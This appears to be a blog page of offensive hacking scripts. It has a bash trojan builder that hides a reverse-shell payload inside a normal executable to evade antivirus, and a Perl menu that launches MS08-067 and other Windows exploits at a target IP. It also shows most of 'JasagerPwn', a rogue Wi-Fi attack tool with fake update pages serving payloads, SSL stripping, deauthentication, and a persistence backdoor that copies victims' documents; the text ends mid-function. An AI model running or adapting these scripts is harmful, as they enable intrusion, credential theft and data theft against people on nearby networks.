#use priv

#hashdump > /tmp/FakeAP_pwn-hash.txt

##session -l

##session -i 1

# Lets crack the hash

#cd /pentest/passwords/jtr/

#./john /tmp/FakeAP_pwn-hash.txt

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

#!/bin/bash

# counts to mangle the trojan to avoid av detect

# keep low we want close to normal filesize for user not to suspect anything

count=15

if [[ -z $3 ]];then

echo “usage $(basename $0) <revservip> <revservport> <binary filename>”

echo “to attach to filename_out.exe”

echo “doesn’t work well for PU binaries, they say”

exit 0

else

ip=$1

port=$2

bin=$3

tdir=$(dirname $bin)

echo “encoding ${bin}-out.exe , mangling $count times”

fi

msfpayload windows/shell/reverse_tcp LHOST=${ip} LPORT=${port} R | \

msfencode -x “${tdir}/${bin}” -t exe -e x86/shikata_ga_nai -o “${tdir}/${bin%%.*}-out.exe” -c $count

# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E

Jun 08

F*ck MS Exploit Menu

print “##############################\n”;

print “# #\n”;

print “# ##### # # ## # # #\n”;

print “# # # # # # # # #\n”;

print “# #### # # # ## #\n”;

print “# # # # # # # # #\n”;

print “# # ### ## # # #\n”;

print “# #\n”;

print “# # # # ## ### ## #\n”;

print “# # # ## # # # # # # # #\n”;

print “# # # # # # ### # # #\n”;

print “# # # # # # # # # # #\n”;

print “# # # # ## # # ## #\n”;

print “# #\n”;

print “# ## ## ##### ###### #\n”;

print “# # # # # # # #\n”;

print “# # # # #### # #\n”;

print “# # # # # # # #\n”;

print “# ## ## # # #\n”;

print “# #\n”;

print “##############################\n”;

system(“sleep 3”);

system(“clear”);

SploitMenu:

print ” ##################\n”;

print ” # Exploit Menu #\n”;

print ” ##################\n”;

print ” 1 - Run MS-08-067 \n”;

print ” 2 - Run MS-10-061 \n”;

print ” 3 - Run MS-03-026 \n”;

print ” 4 - Run MS-04-031 \n”;

print ” 5 - Run MS-07-029 \n”;

print ” 6 - Exit \n”;

print “—————————-\n”;

print “\n\nCh0mpy-Pwn>”;

$choice =<STDIN> ;

if ($choice==1){&ms08067};

if ($choice==2){&ms10061};

if ($choice==3){&dcom};

if ($choice==4){&netdde};

if ($choice==5){&zonename};

if ($choice==6){&exit};

sub ms08067

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-08-067 on them and gives you a Meterpreter shell \n”;

print ” Conficker Style liek a baws \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/smb/ms08_067_netapi RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub ms10061

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-10-061 on them and gives you a Meterpreter shell \n”;

print ” Owning liek a Stuxnet \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/smb/ms10_061_spoolss RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub dcom

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-03-026 on them and gives you a Meterpreter shell \n”;

print ” Dcom vulns… Patch plz lol \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub netdde

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-04-031 on them and gives you a Meterpreter shell \n”;

print ” moar old vulns… Patch plz lol \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/smb/ms04_031_netdde RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub zonename

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-07-029 on them and gives you a Meterpreter shell \n”;

print ” No idea how this one works bro \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/dcerpc/ms07_029_msdns_zonename RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub exit

{

exit

}

Motioncity13’s Option Menu

#!/bin/bash

function pause(){

read -p “$*”

}

function listner () {

echo -n “Enter Payload: “

read pay

echo -n “Enter LHOST: “

read lh

echo -n “Enter LPORT: “

read lp

echo -n “Create Payload (y/n)? “

read t1

if [ “$t1” = “y” ]; then {

echo -n “Filename (*.exe): “

read fil

msfpayload $pay LHOST=$lh LPORT=$lp X > $fil

}

else

msfcli exploit/multi/handler PAYLOAD=$pay LHOST=$lh LPORT=$lp E

fi

}

function nmp () {

echo -n “NMAP IP Address Scanner”

echo

echo “IP Address: “

read ip

echo

echo “First we are going to do a ping scan.”

sleep 2

nmap -sP $ip

pause ‘Press any key to continue…’

echo

echo “Next we are going to scan for the Operating System the slave is running on.”

sleep 2

nmap $ip -O

pause ‘Press any key to continue…’

echo

echo “Next we detect open ports on the target.”

sleep 2

nmap -sS $ip

echo

pause ‘Press any key to continue…’

clear

}

echo ” Menu List”

echo ” —————-“

echo “Motioncity13’s Option Menu (First Bash Code)”

echo

echo “1) Metasploit Payload Generator and Listener”

echo “2) NMAP Scanner”

echo “3) Quit”

echo

while [ 1 ]

do

read op

case “$op” in

“1” )

#Call Metasploit Function

listner

;;

“2” )

#Call NMP Function

nmp

;;

“3” )

echo

exit 0

;;

* )

echo

echo “Wrong selection.”

;;

esac

done

#echo

#exit 0

Jun 07

JasagerPwn Attack

#!/bin/bash

#leg3nd’s JasagerPwn Attack - v1.1 Final - rev8

#ATTACKS - browserPwn - Redirect LAN to Metasloits auxillary module browser autoPwn for sessions

# - FakeUpdate - Redirect LAN to fake update page with metasploit payload download.

# - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET.

# - Sniffer - Justs picks up traffic with no ARP posioning, and perfect ssl stripping

# - DeAuth - Deauths nearby clients from their APs and try to make them join yours

#

# Allows control of internet transparency of all attacks via built in bash menu.

# Reqires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite

# Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.

#

# Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple).

# For More Information refer to INSTALL_HOWTO, usage information -h / -?, or post on Hak5 Forums.

#SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION

IFACE=”eth1” #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc

WiFiMODE=”1” #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1

fonIP=”192.168.10.2” #Fon router Iface IP, this is -HARDCODED- to 192.168.10.0 subnet, the dhcp.conf is below to change.

FONIFACE=”eth2” #Interface facing the Jasager router

WIFACE=”wlan0” #Wireless Interface, EG wlan0,ath0,wifi0

MIFACE=”mon0” #Monitor Interface for Attacks

#Macchanger, ONLY FOR ATTACK INTERFACES

macMode=”set” #Mac spoofing mode - set / random (case sensitive)

fakeMac=”00:e0:f7:99:e1:30” # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl

ourAPmac=”00:12:CF:A4:DF:26” #Pineapple MAC so we dont DeAuth Ourselves!

msfpath=”/pentest/exploits/framework3” #Metasploit Location (if not BT5, use msf3 directory)

SETpath=”/pentest/exploits/set” #Social Engineering Toolkit Location

DomainName=”Networking.com” #Domain name for DHCP configuration.

######################################################################################################################

#Funcion can be used to customize post-exploit meterpreter script. This example steals documents and adds a DNS backdoor.

#This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip)

autoMetScript=”0” #Allows you to automaticlly run a meterpreter persistence script on the victim.

Pport=”31337” # persistence backdoor port

PersIP=”Your.dyndns-ip.com” # Your dyndns or no-ip for backdoors

function metScript(){

if [ -e “$SETpath/src/program_junk/multi_meter.file” ] ; then rm “$SETpath/src/program_junk/multi_meter.file” ; fi #Dont touch this line

# EDIT METERPRETER SCRIPT BELOW THIS, INSIDE THE ECHO QUOTES

echo -e “persistence_dns -r $PersIP -p $Pport -i 60 -X -A

file_collector -d c:\Users\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files

file_collector -i /tmp/files -l $SPWD/collected/

” > $SETpath/src/program_junk/multi_meter.file #DONT CHANGE THIS PATH

}

#DHCP Configuration - Change if you want a different subnet.

if [ -e “/etc/dhcp3/dhcpd.conf” ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi

if [ -e “/tmp/dhcpd.conf” ]; then rm /tmp/dhcpd.conf; fi

echo -e “#jasagerPwn.dhcp

ddns-update-style none;

one-lease-per-client false;

authoritative;

ignore client-updates;

default-lease-time 60; # 24 hours=86400

max-lease-time 72; # 48 hours=172800

log-facility local7;\n

subnet 192.168.10.0 netmask 255.255.255.0 {

interface $FONIFACE;

range 192.168.10.3 192.168.10.254;

option routers 192.168.10.2;

option subnet-mask 255.255.255.0;

option broadcast-address 192.168.10.255;

option domain-name-servers $fonIP;

option domain-name "$DomainName";

allow unknown-clients;

}” » /etc/dhcp3/dhcpd.conf

####-END SCRIPT CONFIG-######

#====================================================================================================================

####################################################################################################################

#SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE

#REQUIRED CHECKS FOR FUNCTIONALITY

version=”1.1”

rev=”8”

Jwww=”/var/www/javapwn”

Gwww=”/var/www/google”

Fwww=”/var/www/fakeupdate”

gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

WIFcheck=`ifconfig | grep $WIFACE | awk ‘{ print $1 }’`

IFcheck=`ifconfig | grep $IFACE | awk ‘{ print $1 }’`

NOW=$(date +”%b-%d_%H:%m:%S”)

sslport=”11000”

SPWD=`echo $PWD`

osxPORT=”30505”

nixPORT=”30504”

winPORT=”30503”

pyPORT=”30502”

javasite=”1”

sniffing=”0”

wasSniffing=”0”

fakeupdate=”0”

browserpwn=”0”

javaATK=”0”

z=”1”

moncheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

ATKcheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

ourIP=`ifconfig $FONIFACE | awk ‘/inet addr/ {split ($2,A,”:”); print A[2]}’`

wifiMAC=`ifconfig $IFACE | grep “HWaddr” | awk ‘{print $5}’ | tr “[a-z]” “[A-Z]”`

googleRev=`wget -qO- “http://jasagerpwn.googlecode.com/svn/trunk/” | grep “<title>jasagerpwn - Revision” | awk -F ” ” ‘{split ($4,A,”:”); print A[1]}’`

trap ‘cleanup’ 2 # Interrupt - “Ctrl + C”

#———————————————————————————————————-

function help() { #help

echo “

- Version $version - Revision $rev -

(C)opyright 2011 leg3nd @ www.info-s3curity.com

Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55]

-p [31337] -a [0/1] -w [interface]

Options:

-a [0/1]   : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript

-p [31337]   : Auto-Run Scripts persistence Port. Current = $Pport

-i [interface] : Internet Gateway Interface. Current = $IFACE

-w [interface] : WiFi Card Interface. Current = $WIFACE

-d [0/1] : WiFi Gateway Mode - Adds DeAuth Rule For Yourself. Current = $WiFiMODE

-m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode

-s [MAC] : Use this MAC Address. Requires -m. Current = $fakeMac

-u : Update script and its resources from Google Code.

-U : Update script, SET, and Metasploit.

-? / -h : Help Screen and Switches. More Information In top of script.

For Installation, setup, and more information, please reference the INSTALL file, wiki, or

Post on the hak5 forums. Please leave comments in the Hak5 thread!

“

exit 1

}

function IPTABLES(){

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —flush”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —table nat —flush”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —delete-chain”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —table nat —delete-chain”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables -X”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables -F”

sleep 4

iptables -P FORWARD ACCEPT

iptables -A FORWARD -m state —state ESTABLISHED,RELATED -j ACCEPT

iptables -A FORWARD -i $FONIFACE -o $IFACE -m state —state NEW -j ACCEPT

iptables -t nat -A PREROUTING —in-interface $FONIFACE -p udp —dport 53 -j DNAT —to $gatewayIP

iptables —append FORWARD —in-interface $FONIFACE -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $IFACE -j MASQUERADE

ifconfig $FONIFACE $fonIP

}

function ipTableRedirect {

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —flush”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —table nat —flush”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —delete-chain”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables —table nat —delete-chain”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables -X”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables” -e “iptables -F”

sleep 4

if [ $sniffing -eq “1” ] ; then

#iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports $sslport

#iptables —table nat —append PREROUTING —proto tcp —destination-port 80 —jump REDIRECT —to-port 80

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Tail” -e “kill $TAILPID” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing SSLStrip” -e “killall -9 sslstrip” &

wasSniffing=$sniffing

sniffing=”0”

fi

iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface $FONIFACE -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $IFACE -j MASQUERADE

iptables -t nat -A PREROUTING —in-interface $FONIFACE -p udp -j DNAT —to $fonIP

sleep .5

iptables —table nat —append PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP

iptables —table nat —append PREROUTING —in-interface $FONIFACE —jump REDIRECT

iptables —table nat —append PREROUTING —in-interface $FONIFACE

#redirect all traffic to us

#iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT

ifconfig $FONIFACE $fonIP

}

#Script update via google code

function update(){

if [ ! $googleRev ]; then

echo -e “\e[01;31m[!]\e[00m ERROR: Couldn’t resolve revision from google..”

exit 1

elif [ $googleRev -lt $rev ]; then

echo -e “\e[01;31m[!]\e[00m UPDATE: JasagerPwn Revisions have been RESET, Please Re-Download It!”

echo -e “\e[01;31m[!]\e[00m Command: svn checkout http://jasagerpwn.googlecode.com/svn/trunk/ jasager-pwn”

exit 1

elif [ $googleRev -gt $rev ]; then

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Updating to rev$googleRev…”

wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/jasagerPwn”

wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/INSTALL_HOWTO”

wget -q -N -P “$SPWD/src/resources/” “http://jasagerpwn.googlecode.com/svn/trunk/src/resources/persistence_dns.rb”

wget -q -N -P “$SPWD/src/resources/” “http://jasagerpwn.googlecode.com/svn/trunk/src/deauth.sh”

#FakeUpdate (wwwFakeUpdate)

for Fitems in “index.php” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/$Fitems” ; fi

done

#FakeUpdate MS

for FitemsMS in “index.html” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/ms/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/ms/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ms/$FitemsMS” ; fi

done

#FakeUpdate OSX

for FitemsOSX in “index.html” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/osx/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/osx/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/osx/$FitemsOSX” ; fi

done

#FakeUpdate Linux

for FitemsNIX in “index.html” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/” ] ; then wget -q -N -P “$SPWD/wwwFakeUpdate/ubuntu/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ubuntu/$FitemsNIX” ; fi

done

#JavaPwn

for Jitems in “index.template” “index.template.plain” ; do

if [ -e “$SPWD/src/wwwJava/” ] ; then wget -q -N -P “$SPWD/src/wwwJava/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems” ; fi

done

for Jitems2 in “global.js” “index.jsp” “oo_conf_en-US.js” ”oo_engine.js” ”popUp.js” ”print.css” ”s_code_remote.js” ”screen.css” ; do

if [ -e “$SPWD/src/wwwJava/temp/” ] ; then wget -q -N -P “$SPWD/src/wwwJava” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2” ; fi

done

#Google

for Gitems in “index.template” ; do

if [ -e “$SPWD/src/wwwGoogle/” ] ; then wget -q -N -P “$SPWD/src/wwwGoogle/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems” ; fi

done

for Gitems2 in “favicon.ico” “gzip.html” “js1.js” ; do

if [ -e “$SPWD/src/wwwGoogle/temp/” ] ; then wget -q -N -P “$SPWD/wwwGoogle/temp/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2” ; fi

done

elif [ $googleRev -eq $rev ]; then

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Your Already Up To Date!”

fi

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - All Done!”

exit 1

}

#Full update including MSF/SET

function Fupdate(){

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - Updating Metasploit..”

xterm -fg green -bg black -geometry 75x20+0+0 -T “JasagerPwn v$version rev$googleRev - Metaploit Update” -e “cd $msfpath && ./msfupdate”

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - Updating SET..”

xterm -fg green -bg black -geometry 75x20-0+0 -T “JasagerPwn v$version rev$googleRev - SET Update” -e “cd $SETpath && python set-update”

if [ ! $googleRev ]; then

echo -e “\e[01;31m[!]\e[00m ERROR: Couldn’t resolve revision from google..”

exit 1

elif [ $googleRev -lt $rev ]; then

echo -e “\e[01;31m[!]\e[00m ERROR: Your revision number is higher then it should be… “

exit 1

elif [ $googleRev -gt $rev ]; then

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Updating to rev$googleRev…”

wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/jasagerPwn”

wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/INSTALL_HOWTO”

wget -q -N -P “$SPWD/src/” “http://jasagerpwn.googlecode.com/svn/trunk/src/resources/persistence_dns.rb”

wget -q -N -P “$SPWD/src/” “http://jasagerpwn.googlecode.com/svn/trunk/src/deauth.sh”

#FakeUpdate (wwwFakeUpdate)

for Fitems in “index.php” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/$Fitems” ; fi

done

#FakeUpdate MS

for FitemsMS in “index.html” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/ms/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/ms/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ms/$FitemsMS” ; fi

done

#FakeUpdate OSX

for FitemsOSX in “index.html” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/osx/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/osx/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/osx/$FitemsOSX” ; fi

done

#FakeUpdate Linux

for FitemsNIX in “index.html” ; do

if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/” ] ; then wget -q -N -P “$SPWD/wwwFakeUpdate/ubuntu/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ubuntu/$FitemsNIX” ; fi

done

#JavaPwn (wwwJava)

for Jitems in “index.template” “index.template.plain” ; do

if [ -e “$SPWD/src/wwwJava/” ] ; then wget -q -N -P “$SPWD/src/wwwJava/” “http://jasagerpwn.googlecode.com/svn/trunk/wwwJava/$Jitems” ; fi

done

for Jitems2 in “global.js” “index.jsp” “oo_conf_en-US.js” ”oo_engine.js” ”popUp.js” ”print.css” ”s_code_remote.js” ”screen.css” ; do

if [ -e “$SPWD/src/wwwJava/temp/” ] ; then wget -q -N -P “$SPWD/src/wwwJava” “http://jasagerpwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2” ; fi

done

#Google (wwwGoogle)

for Gitems in “index.template” ; do

if [ -e “$SPWD/src/wwwGoogle/” ] ; then wget -q -N -P “$SPWD/src/wwwGoogle/” “http://jasagerpwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems” ; fi

done

for Gitems2 in “favicon.ico” “gzip.html” “js1.js” ; do

if [ -e “$SPWD/src/wwwGoogle/temp/” ] ; then wget -q -N -P “$SPWD/wwwGoogle/temp/” “http://jasagerpwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2” ; fi

done

elif [ $googleRev -eq $rev ]; then

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Your Already Up To Date!”

fi

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - All Done!”

exit 1

}

#function for fluid use of both SET templates

function JavaSite(){

GoogCheck=`cat $SETpath/config/set_config | grep “APACHE_DIRECTORY=/var/www/javapwn”`

#1 = google 2 = java required

if [ “$javasite” -eq “1” ] && [ “$GoogCheck” = “APACHE_DIRECTORY=/var/www/javapwn” ]; then

sed ”${SETapacheDIR}’s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!’ $SETpath/config/set_config > $SETpath/config/set_configJ

sleep 1

mv $SETpath/config/set_configJ $SETpath/config/set_config

elif [ “$javasite” -eq “2” ]; then

sed ”${SETapacheDIR}’s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!’ $SETpath/config/set_config > $SETpath/config/set_configG

sleep 1

mv $SETpath/config/set_configG $SETpath/config/set_config

fi

}

function sslstrip(){

iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports $sslport

xterm -geometry 75x3+1-25 -bg black -fg green -e “sslstrip -l $sslport && sleep 3” &

if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi

xterm -geometry 75x24+464+65 -bg black -fg green -T “SSLStrip Sniffing” -e “tail -f sslstrip.log” &

TAILPID=`echo $!`

sniffing=”1”

wasSniffing=$sniffing

}

function cleanup() {

echo

echo -e “\e[01;32m[>]\e[00m Cleaning up…”

if [ -e /tmp/dhcpd.conf ]; then rm -f /tmp/dhcpd.conf; fi

resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “killall -9 driftnet” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing SSLStrip” -e “killall -9 sslstrip” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Apache” -e “/etc/init.d/apache2 stop” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Tail” -e “kill $DNSID” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Dsniff” -e “kill $dsniffID” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Tail” -e “kill $TAILPID” &

#xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing SSL Parsing” -e “kill $parseID” &

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DHCP” -e “kill $messageID” &

xterm -geometry 75x12+464+288 -bg black -fg green -T “JasagerPwn v$version - Killing DeAuth Attacks” -e “kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID” &

#xterm -geometry 75x7+10+330 -T “[leg3nd-BrowserPwn] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

xterm -geometry 75x7+10+330 -T “[JasagerPwn-BrowserPwn] v$version - Killing DHCP3” -e “/etc/init.d/dhcp3-server stop”

xterm -geometry 75x7+10+330 -T “[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf” -e “killall -9 urlsnarf”

xterm -geometry 75x7+10+330 -T “[JasagerPwn-BrowserPwn] v$version - Killing DSniff” -e “killall -9 dsniff”

xterm -geometry 75x8+100+0 -T “v$version - Killing ‘IPtables’” -e “iptables -F” &

xterm -geometry 75x8+100+0 -T “v$version - Killing ‘IPtables’” -e “iptables -X” &

#Clean up our cfgs

if [ -e “$PWD/dsniff.services” ]; then rm “$PWD/dsniff.services” ; fi

if [ -e “$SPWD/*.png” ]; then rm “$SPWD/*.png” ; fi

if [ -d “$SETpath/src/html/templates/java/temp/” ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi

if [ -d “$SETpath/src/html/templates/google/temp/” ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi

if [ -e “$SETpath/src/html/templates/java/index.template” ] && [ -e “$SETpath/src/html/templates/java/index.template.ORIGINAL” ]; then

mv “$SETpath/src/html/templates/java/index.template.ORIGINAL” “$SETpath/src/html/templates/java/index.template”

fi

APACHEDIR=`cat $SETpath/config/set_config | grep “/var/www/javapwn”`

if [ -e “$SETpath/src/html/templates/google/index.template.ORIGINAL” ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi

if [ -e “$SETpath/src/html/templates/java/index.template.ORIGINAL” ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi

if [ -e “$SETpath/config/set_config.ORIGINAL” ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi

if [ -e “/etc/dhcp3/dhcpd.conf” ] && [ -e “/etc/dhcp3/dhcpd.conf.ORIGINAL” ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi

if [ -e “/etc/resolv.conf” ] && [ -e “/etc/resolv.conf.ORIGINAL” ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi

if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/index.html.ORIGINAL” ] ; then cp -f $SPWD/src/wwwFakeUpdate/ubuntu/index.html.ORIGINAL $SPWD/src/wwwFakeUpdate/ubuntu/index.html ; fi

if [ -e “$SPWD/src/wwwFakeUpdate/osx/index.html.ORIGINAL” ] ; then cp -f $SPWD/src/wwwFakeUpdate/osx/index.html.ORIGINAL $SPWD/src/wwwFakeUpdate/osx/index.html ; fi

if [ -e “/tmp/msfrcBP” ]; then rm “/tmp/msfrcBP”; fi

if [ -e “/tmp/msfrcFU” ]; then rm “/tmp/msfrcFU”; fi

if [ -e “/tmp/jasagerpwn.dns” ]; then rm “/tmp/jasagerpwn.dns”; fi

if [ -e “/tmp/deauth.conf” ]; then rm “/tmp/deauth.conf”; fi

if [ -e “/tmp/auto-google2” ]; then rm “/tmp/auto-google2”; fi

if [ -e “/tmp/auto-java2” ]; then rm “/tmp/auto-java2”; fi

if [ -e “/tmp/resolv.sh” ]; then rm “/tmp/resolv.sh”; fi

if [ -e “$SPWD/sslstrip.log” ]; then mv “$SPWD/sslstrip.log” “$SPWD/collected/$NOW-sslstrip.log”; fi

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Self” -e “killall -9 jasagerPwn” &

echo -e “\e[01;36m[~]\e[00m Exiting with elegance..”

exit 0

}

function fakeupdate(){

ourIP=`ifconfig $FONIFACE | awk ‘/inet addr/ {split ($2,A,”:”); print A[2]}’`

if [ -e “$pwd/src/wwwFakeUpdate/ms/Windows-KB183905-x86-ENU.exe” ]; then rm -f “$pwd/src/wwwFakeUpdate/ms/Windows-KB183905-x86-ENU.exe”; fi

if [ -e “$pwd/src/wwwFakeUpdate/osx/SecurityUpdate1-83-90-5.dmg.bin” ]; then rm -f “$pwd/src/wwwFakeUpdate/osx/SecurityUpdate1-83-90-5.dmg.bin”; fi

if [ -e “$pwd/src/wwwFakeUpdate/ubuntu/USN1228.bin” ]; then rm -f “$pwd/src/wwwFakeUpdate/ubuntu/USN1228.bin”; fi

if [ -e “$pwd/src/wwwFakeUpdate/ubuntu/nix.bin” ]; then rm -f “$pwd/src/wwwFakeUpdate/ubuntu/nix.bin”; fi

if [ -e “$Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin” ]; then rm -f “$Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin”; fi

